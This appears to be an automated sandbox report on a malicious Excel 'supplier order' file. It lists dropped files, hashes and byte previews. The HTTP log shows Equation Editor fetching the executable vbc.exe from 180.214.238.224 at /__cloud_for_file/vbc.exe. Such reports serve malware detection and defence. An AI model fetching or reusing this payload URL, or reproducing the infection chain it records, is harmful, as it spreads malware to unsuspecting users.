    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57CFF8ED.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71BAD9C.jpeg

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74B1E683.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1E3120A.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD99E047.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F549927F.png

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

    C:\Users\user\AppData\Local\Temp\~DF154F786FDBAE324B.TMP

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\~DF299AB401C235ABC6.TMP

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\~DFDCEA4DA1BBD5FBBA.TMP

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:CDFV2 Encrypted
    Category:dropped
    Size (bytes):188488
    Entropy (8bit):7.9577593900244965
    Encrypted:false
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    MD5:650BB8E5FE570BDE782BE21C4E9F421C
    SHA1:FD3FFA031546F1DFA7ED884689CA1E85941FCA1E
    SHA-256:247838308FB5E12A258DEF82A63E3A752D1536D1771539D63CEBCF283B8154B5
    SHA-512:B288B2BFF546A427C6C683879F4AA17F60C794B8A0DF3ABFEA37451490C7F737A5BA5460FAB91E09CEA69A0E6DBF6DFF7CA65206369E7E8E19AB2058B7342CC7
    Malicious:false
    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

    C:\Users\user\AppData\Local\Temp\~DFE8FF70B607AC6E32.TMP

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsx

    Download File
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:true
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

    C:\Users\Public\vbc.exe

    Download File
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:dropped
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|.......... ........@.. ....................................`.................................p...W....................................P............................................... ............... ..H............text....u... ...v.................. ..`.reloc...............x..............@..B.rsrc................z..............@..@........................H........P...D...........=..............................................".(.....*....0...........(>...*..0..6.......+.&.(.....(.....(....:.....E.........-......&&..(.... y...(....%& ~...(....%&(.... ....(.... ....(....(.... ....(.... ....(....(.... ....(.... ....(....%&(.... ....(....%& ....(....(.......(....(....:.....E........&..(......(....9....&.(.......(....(....%&:.....E........&...(.......(........(....%&(....&. (....8.....$(....(....%.((.......%.,(....~?....%.0(......

    Static File Info

    General

    File type:CDFV2 Encrypted
    Entropy (8bit):7.9577593900244965
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name:TedarikciSiparisi_83613 .xlsx
    File size:188488
    MD5:650bb8e5fe570bde782be21c4e9f421c
    SHA1:fd3ffa031546f1dfa7ed884689ca1e85941fca1e
    SHA256:247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
    SHA512:b288b2bff546a427c6c683879f4aa17f60c794b8a0df3abfea37451490c7f737a5ba5460fab91e09cea69a0e6dbf6dff7ca65206369e7e8e19ab2058b7342cc7
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    TLSH:0B041267B487283DF61262390A8B5493C52C9FCB88BBD16A468CBD75F77CE6050B243D
    File Content Preview:........................>......................................................................................................................................................................................................................................

    File Icon

    Icon Hash:e4e2aa8aa4b4bcb4

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    May 14, 2022 15:14:12.248838902 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.467067957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.467297077 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.468460083 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.687846899 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687892914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687918901 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.687942028 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.688054085 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.692761898 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906400919 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906440020 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906470060 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906497955 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906524897 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906553984 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.906555891 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906588078 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906590939 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.906594038 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.910749912 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.910798073 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:12.910878897 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:12.910897017 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124620914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124664068 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124681950 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124692917 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124703884 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124722958 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124732018 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124754906 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124763966 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124785900 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124799013 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124815941 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124823093 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124842882 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124852896 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124872923 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124880075 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124902964 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124911070 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124931097 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124939919 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124960899 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.124968052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.124998093 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.126954079 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128725052 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128786087 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128842115 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128844976 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128849983 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128881931 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.128887892 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.128926039 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.342945099 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343007088 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343050957 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343091011 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343121052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343125105 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343126059 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343163967 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343167067 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343202114 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343209028 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343250990 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343255043 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343287945 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343291998 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343332052 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343333960 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343372107 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343373060 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343411922 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343414068 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343451977 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343453884 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343493938 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343493938 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343529940 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343534946 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343569994 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343575001 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343612909 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343616009 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343653917 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343658924 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343696117 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343698025 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343735933 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343739986 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343776941 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343785048 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343822956 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343825102 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.343863010 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.343864918 CEST8049171180.214.238.224192.168.2.22

    HTTP Request Dependency Graph

    • 180.214.238.224

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.2249171180.214.238.22480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampkBytes transferredDirectionData
    May 14, 2022 15:14:12.468460083 CEST2OUTGET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
    May 14, 2022 15:14:12.687846899 CEST3INHTTP/1.1 200 OK
    Date: Sat, 14 May 2022 13:14:18 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Fri, 13 May 2022 09:07:10 GMT
    ETag: "38000-5dee0ffdad130"
    Accept-Ranges: bytes
    Content-Length: 229376
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
